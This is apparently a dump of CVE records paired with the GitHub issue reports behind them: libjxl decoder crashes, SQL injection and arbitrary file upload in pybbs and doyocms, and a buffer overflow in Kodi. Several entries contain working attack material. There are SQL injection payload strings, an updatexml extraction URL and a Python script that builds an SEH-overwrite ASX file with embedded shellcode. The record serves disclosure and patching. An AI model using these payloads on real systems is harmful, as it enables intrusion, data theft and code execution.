std::__1::allocator<std::__1::pair<jxl::Plane<float>*, jxl::Rect> > > const&, jxl::PassesDecoderState*, unsigned long, jxl::ImageBundle*, jxl::Rect const&) libjxl/lib/jxl/dec_reconstruct.cc:912:28 #4 0x1711d27 in jxl::PassesDecoderState::FinalizeGroup(unsigned long, unsigned long, jxl::Image3<float>*, jxl::ImageBundle*) libjxl/lib/jxl/dec_cache.cc:164:5 #5 0x141bed3 in jxl::N_AVX2::DecodeGroupImpl(jxl::GetBlock*, jxl::GroupDecCache*, jxl::PassesDecoderState*, unsigned long, unsigned long, jxl::ImageBundle*, jxl::DrawMode) libjxl/lib/jxl/dec_group.cc:441:5 #6 0x142fc1e in jxl::DecodeGroup(jxl::BitReader* restrict*, unsigned long, unsigned long, jxl::PassesDecoderState*, jxl::GroupDecCache*, unsigned long, jxl::ImageBundle*, unsigned long, bool, bool) libjxl/lib/jxl/dec_group.cc:754:3 #7 0x14048da in jxl::FrameDecoder::ProcessACGroup(unsigned long, jxl::BitReader* restrict*, unsigned long, unsigned long, bool, bool) libjxl/lib/jxl/dec_frame.cc:579:5 #8 0x140b6ef in operator() libjxl/lib/jxl/dec_frame.cc:744:16 ``` It looks like, when drawing spline segments, `segment_y_start` for this image contains 253 entries but `image_rect.y0()` can return higher values for `y` that result in `DrawSegment()` reading beyond the end of this. https://github.com/libjxl/libjxl/blob/795ba9c3dd45294947d6777910e0ac6e04e59ef4/lib/jxl/splines.cc#L149-L153 The following patch to `Apply()` demonstrates a possible guard to prevent the segfault, but there's almost certainly a better way to fix this. ```diff --- a/lib/jxl/splines.cc +++ b/lib/jxl/splines.cc @@ -552,6 +552,7 @@ template <bool add> void Splines::Apply(Image3F* const opsin, const Rect& opsin_rect, const Rect& image_rect) const { if (segments_.empty()) return; + if (image_rect.y0() >= segment_y_start_.size()) return; for (size_t iy = 0; iy < image_rect.ysize(); iy++) { HWY_DYNAMIC_DISPATCH(DrawSegments) (opsin, opsin_rect.Line(iy), image_rect.Line(iy), add, segments_.data(), ```
splines: segfault due to out of bounds access of segment array
https://api.github.com/repos/libjxl/libjxl/issues/735/comments
7
2021-10-14T20:01:32Z
2021-11-01T21:54:23Z
https://github.com/libjxl/libjxl/issues/735
1,026,770,643
735
2,734
CVE-2021-22564
2021-11-01T13:15:07.713
For certain valid JPEG XL images with a size slightly larger than an integer number of groups (256x256 pixels) when processing the groups out of order the decoder can perform an out of bounds copy of image pixels from an image buffer in the heap to another. This copy can occur when processing the right or bottom edges of the image, but only when groups are processed in certain order. Groups can be processed out of order in multi-threaded decoding environments with heavy thread load but also with images that contain the groups in an arbitrary order in the file. It is recommended to upgrade past 0.6.0 or patch with https://github.com/libjxl/libjxl/pull/775
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.4, "source": "cve-coordination@google.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve-coordination@google.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/708" }, { "source": "cve-coordination@google.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/775" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/708" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/775" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*", "matchCriteriaId": "7CC7FB7C-9506-45CF-A086-07481ACC16C6", "versionEndExcluding": null, "versionEndIncluding": "0.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libjxl/libjxl/issues/708
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libjxl", "libjxl" ]
Hello, This crash occurs when a Qt application decode more JXL files at the same time via my [qt-jpegxl-image-plugin](https://github.com/novomesk/qt-jpegxl-image-plugin) During the crash I see following message: `/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from)` ``` #0 jxl::Abort () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/base/status.cc:42 #1 0x00007fffe872f964 in jxl::CopyImageTo<float> () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48 #2 0x00007fffe8844075 in LoadBorders () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_cache.cc:110 #3 jxl::PassesDecoderState::FinalizeGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_cache.cc:156 #4 0x00007fffe8863925 in jxl::N_AVX2::DecodeGroupImpl () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_group.cc:441 #5 0x00007fffe886458f in jxl::DecodeGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_group.cc:754 #6 0x00007fffe8848f9d in jxl::FrameDecoder::ProcessACGroup () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_frame.cc:579 #7 0x00007fffe88490d5 in operator() () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/dec_frame.cc:746 #8 CallDataFunc () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/base/data_parallel.h:88 #9 0x00007fffe8a011af in jpegxl::ThreadParallelRunner::RunRange () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/threads/thread_parallel_runner_internal.cc:139 #10 0x00007fffe8a012ab in jpegxl::ThreadParallelRunner::ThreadFunc () at /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/threads/thread_parallel_runner_internal.cc:169 #11 0x00007ffff72b7e30 in std::execute_native_thread_routine (__p=0x7fffe0005390) at /var/tmp/portage/sys-devel/gcc-10.3.0-r2/work/gcc-10.3.0/libstdc++-v3/src/c++11/thread.cc:80 #12 0x00007ffff7f80e3e in start_thread () from /lib64/libpthread.so.0 #13 0x00007ffff6fd32cf in clone () from /lib64/libc.so.6 ``` Here is a simple console application I am able to reproduce crash easily: [sources.zip](https://github.com/libjxl/libjxl/files/7309663/sources.zip) How to compile and run: ``` qmake test_crash.pro make ``` The application decodes bucuresti2.jxl file in two threads (0 - main thread, 1 - worker thread). Each thread have different instance of the plug-in and each plug-in create own ParallelRunner. It may not crash during first iteration, but sooner or later it crashes. The output may run like this: ``` ./test_crash Iteration: 0 [0] 10916x9985 count:1 [1] 10916x9985 count:1 Iteration: 1 [0] 10916x9985 count:1 [1] 10916x9985 count:1 Iteration: 2 [1] 10916x9985 count:1 /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from) Neprípustná inštrukcia ``` Sometime it crashes immediately: ``` Iteration: 0 /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from) /var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect_from.IsInside(from) Neprípustná inštrukcia ``` When just one thread with plug-in is running at a time, there is no crash.
Crash during multiple concurrent/parallel decoding
https://api.github.com/repos/libjxl/libjxl/issues/708/comments
9
2021-10-08T08:45:08Z
2021-11-01T10:36:28Z
https://github.com/libjxl/libjxl/issues/708
1,020,849,009
708
2,735
CVE-2020-28702
2021-11-01T14:15:07.607
A SQL injection vulnerability in TopicMapper.xml of PybbsCMS v5.2.1 allows attackers to access sensitive database information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tomoya92/pybbs/issues/137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tomoya92/pybbs/issues/137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pybbs_project:pybbs:5.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "56EBA5D0-DC5B-453F-85D6-9D65A914C615", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/tomoya92/pybbs/issues/137
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tomoya92", "pybbs" ]
Official website of the manufacturer involved: https://17dev.club/ Source code download address: https://github.com/tomoya92/pybbs Framework version: V5.2.1 Vulnerability type: SQL injection Vulnerability status: not fixed Vulnerability level: high Code analysis and vulnerability recurrence: As can be seen from screenshot below(see the upper left mark of Figure 1.1 for the detailed code path), the "$" symbol is used in the SQL statement in line 83 of the code, resulting in a possible SQL injection vulnerability. From this SQL section, we trace back to the interface functions, and then we find that the SQL section is the topic query SQL of the user's main interface. ![1](https://user-images.githubusercontent.com/39976010/98195527-f0a92000-1f5c-11eb-9c51-d4d3ec177949.png) There is no front-end filtering operation in the input box, and the existence of the vulnerability can be verified manually. Start the project, log in the front end after registering users, create a new topic with the content of "1111111" and the title of "test", and then enter 2 in the search bar, and no data can be found.However, enter '2%' or 1 = 1 -- '(including spaces) , proving that there is a SQL injection vulnerability. ![2](https://user-images.githubusercontent.com/39976010/98201814-85b31580-1f6b-11eb-9101-79156bbc382f.png) ![3](https://user-images.githubusercontent.com/39976010/98202149-581a9c00-1f6c-11eb-8225-1932029e022f.png) ![4](https://user-images.githubusercontent.com/39976010/98202152-59e45f80-1f6c-11eb-82b2-24e3d97f9276.png) Here is the result of sqlmap: ![2](https://user-images.githubusercontent.com/39976010/98203060-4fc36080-1f6e-11eb-9b32-33087d81b144.png) ![3](https://user-images.githubusercontent.com/39976010/98203063-518d2400-1f6e-11eb-881f-ab427967d326.png) Here is the packet content: ![1](https://user-images.githubusercontent.com/39976010/98203065-5225ba80-1f6e-11eb-9b11-fc4721962546.png) GET /search?keyword=2 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8080/search?keyword=2 Cookie: Idea-54cb6313=611cbcaa-eb60-4866-8b10-8f2fea455b22; Authorization=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxIiwiZXhwIjoxNTk5MDE3NzgzLCJ1c2VySWQiOjEsImlhdCI6MTU5ODkzMTM4MywiYWNjb3VudCI6ImFkbWluIiwidXNlcktleSI6Inh4eHgifQ.3MRd8n5x78QuNnClBjWZxc4Y4oplRV6mtBd53m5FghR1ilaqt7FczhIUyryrjRme12TBgwrzI-qGs3eHN5_q4g; JSESSIONID=UMjiO7zbFl9WqWoAVl0PqfFR4PtuQkZBamTULP5y; user_token=b8c937e7-1494-4b7d-bb58-e1442a0d0f74 Upgrade-Insecure-Requests: 1
SQL injection vulnerability in version 5.2.1
https://api.github.com/repos/atjiu/pybbs/issues/137/comments
1
2020-11-05T05:58:18Z
2020-11-05T08:56:51Z
https://github.com/atjiu/pybbs/issues/137
736,637,859
137
2,736
CVE-2021-26739
2021-11-01T16:15:07.537
SQL Injection vulnerability in pay.php in millken doyocms 2.3, allows attackers to execute arbitrary code, via the attribute parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/millken/doyocms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/millken/doyocms/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:doyocms_project:doyocms:2.3:*:*:*:*:*:*:*", "matchCriteriaId": "0C51EF13-51B0-4A4B-9CD6-445B7EBE3B57", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/millken/doyocms/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "millken", "doyocms" ]
Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account. The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect ![image (1)](https://user-images.githubusercontent.com/32975053/106414663-242a1680-6488-11eb-88eb-e8c38bf3e04f.png) in pay.php: ![image](https://user-images.githubusercontent.com/32975053/106414651-196f8180-6488-11eb-8e14-8f234236d288.png) payload: http://192.168.0.105/?c=pay&a=cartadd&id=1&quantity=1&attribute[]=123123' or updatexml(2,concat(0x7e,(version())),0) or' ![image](https://user-images.githubusercontent.com/32975053/106414733-50de2e00-6488-11eb-9189-039497ad7542.png)
There is a sqli vulnerability in pay.php,No admin user login required
https://api.github.com/repos/millken/doyocms/issues/5/comments
0
2021-02-01T04:26:10Z
2021-02-01T04:26:10Z
https://github.com/millken/doyocms/issues/5
797,937,862
5
2,737
CVE-2021-26740
2021-11-01T16:15:07.590
Arbitrary file upload vulnerability sysupload.php in millken doyocms 2.3 allows attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/millken/doyocms/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/millken/doyocms/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:doyocms_project:doyocms:2.3:*:*:*:*:*:*:*", "matchCriteriaId": "0C51EF13-51B0-4A4B-9CD6-445B7EBE3B57", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/millken/doyocms/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "millken", "doyocms" ]
in uploads.php The first line receives the parameter allow, which is passed in when the syUpload object is instantiated, and when the syupload object is constructed, the passed allow is directly used as the allowed suffix dictionary ![image](https://user-images.githubusercontent.com/32975053/106414265-26d83c00-6487-11eb-8f59-6ea449320fa0.png) ![image (1)](https://user-images.githubusercontent.com/32975053/106414373-6868e700-6487-11eb-82c4-c378a2241e2b.png) So when we upload, we only need to add an allow parameter to upload files with any suffix ![image (3)](https://user-images.githubusercontent.com/32975053/106414427-86cee280-6487-11eb-8c36-2d3f8b21eb96.png) ![image (2)](https://user-images.githubusercontent.com/32975053/106414429-88000f80-6487-11eb-8dae-46107aef5231.png)
Vulnerabilities can be used to upload files of any type
https://api.github.com/repos/millken/doyocms/issues/4/comments
0
2021-02-01T04:18:20Z
2021-02-01T04:18:20Z
https://github.com/millken/doyocms/issues/4
797,934,747
4
2,738
CVE-2021-42917
2021-11-01T19:15:07.910
Buffer overflow vulnerability in Kodi xbmc up to 19.0, allows attackers to cause a denial of service due to improper length of values passed to istream.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fuzzard/xbmc/commit/80c8138c09598e88b4ddb6dbb279fa193bbb3237" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/commit/48730b64494798705d46dfccc4029bd36d072df3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/issues/20305" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/pull/20306" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fuzzard/xbmc/commit/80c8138c09598e88b4ddb6dbb279fa193bbb3237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/commit/48730b64494798705d46dfccc4029bd36d072df3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/issues/20305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/xbmc/xbmc/pull/20306" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kodi:kodi:*:*:*:*:*:*:*:*", "matchCriteriaId": "91304B46-2581-43C9-A78E-CB9666DF7F3D", "versionEndExcluding": "19.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/xbmc/xbmc/issues/20305
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xbmc", "xbmc" ]
<!--- Please fill out this template to the best of your ability. You can always edit this issue once you have created it. --> <!--- Read the following link before you create a new problem report: https://kodi.wiki/view/HOW-TO:Submit_a_bug_report --> ## Bug report ### Describe the bug The attached ASX FILE causes a crash in Kodi v19.0 on Windows 10. To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following: Thread 65E4 exit Thread E18 exit Thread E14 exit Breakpoint at 00007FFB6E343005 set! INT3 breakpoint at ucrtbase.00007FFB6E343005 (00007FFB6E343005)! 000000E0BFF4F7E0 0000000000000000 000000E0BFF4F7E8 00007FFB70C62651 return to ntdll.00007FFB70C62651 from ??? 000000E0BFF4F7F0 0000000000000000 000000E0BFF4F7F8 0000000000000000 000000E0BFF4F800 0000000000000000 ## Expected Behavior Should display file type not supported or unable to open file ## Actual Behavior <!--- Takes hrs to load Kodi and in some case, it crases --> ### To Reproduce Steps to reproduce the behavior: firstly, close running kodi application -------------------------------- head ='''<ASX version="3.0"> <Entry> <REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_''' junk = "A" * 1975 nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x30\x83\xc0\x0c" shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV" "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL" "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9" "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW" "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R" "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA") junk_="R"*8000 foot ='''_playlis.wma"/> </Entry> </ASX>''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.asx","w") fobj.write(payload) fobj.close() --------------------------------------- poc.asx is generated now open with kodi . it will take hrs to open kodi .on some cases it crash [poc.zip](https://github.com/xbmc/xbmc/files/7327188/poc.zip) ##Debug 000000E0BFF4D5C8 000000E0BFF4DB90 "¸YK%ö\x7F" 000000E0BFF4D5D0 000000E0BFF4DB00 000000E0BFF4D5D8 000000E0BFF4DB90 "¸YK%ö\x7F" 000000E0BFF4D5E0 000000E0BFF4DA60 &"Error null (0) or unexpected EOF found in input stream." 000000E0BFF4D5E8 00007FF6239DAD4D return to kodi.00007FF6239DAD4D from kodi.00007FF6252B641F 000000E0BFF4D5F0 000000E0BFF4DB90 "¸YK%ö\x7F" 000000E0BFF4D5F8 00007FFB6E34C001 ucrtbase.00007FFB6E34C001 000000E0BFF4D600 0000000000000052 000000E0BFF4D608 000000E0BFF4D900 &"¸YK%ö\x7F" 000000E0BFF4D610 000000000000001E 000000E0BFF4D618 0000000000000000 000000E0BFF4D620 0000000000000015 000000E0BFF4D628 0000021CBDAC1600 000000E0BFF4D630 00007FF62549D580 kodi.00007FF62549D580 000000E0BFF4D638 0000021CBDAC16A0 &"pt*%ö\x7F" 000000E0BFF4DC10 0000021CBDD71F10 "<ASX version=\"3.0\">\r\n<Entry>\r\n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 000000E0BFF4DC18 0001000000000000 000000E0BFF4DC20 0000021CBF7D10A0 000000E0BFF4DC28 00000000BDA60930 000000E0BFF4DC30 00007FF6254B59B0 kodi.00007FF6254B59B0 000000E0BFF4DC38 0000000000000000 000000E0BFF4DC40 0000000000000000 000000E0BFF4DC48 00007FFB00000201 000000E0BFF4DC50 0000000000000006 000000E0BFF4DC58 0000000000000000 000000E0BFF4DC60 0000000000000000 000000E0BFF4DC68 0000000000000000 000000E0BFF4DC70 0000021CBF26F230 000000E0BFF4DC78 000000E0BFF4DBA0 "0YK%ö\x7F" 000000E0BFF4DC80 0000000000000000 000000E0BFF4DC88 0000000000000020 000000E0BFF4DC90 0000021CBF706200 "C:\\Users\\THINKPAD\\Desktop\\" 000000E0BFF4DC98 0000000000000000 000000E0BFF4DCA0 0000000000000000 000000E0BFF4DCA8 000000000000000F 000000E0BFF4DCB0 000006988439F3AC 000000E0BFF4DCB8 00007FFB70C347CD return to ntdll.00007FFB70C347CD from ntdll.00007FFB70C34880 000000E0BFF4DCC0 0000021CB4C59AD0 &"À4¡#ö\x7F" 000000E0BFF4DCC8 0000021CB4C59AC0 000000E0BFF4DCD0 000000E0BFF4DD89 000000E0BFF4DCD8 00007FF623CF1D19 return to kodi.00007FF623CF1D19 from ??? 000000E0BFF4DCE0 0000021CB4C59AC0 000000E0BFF4DCE8 0000021CBDDD72F0 &"à.¦#ö\x7F" 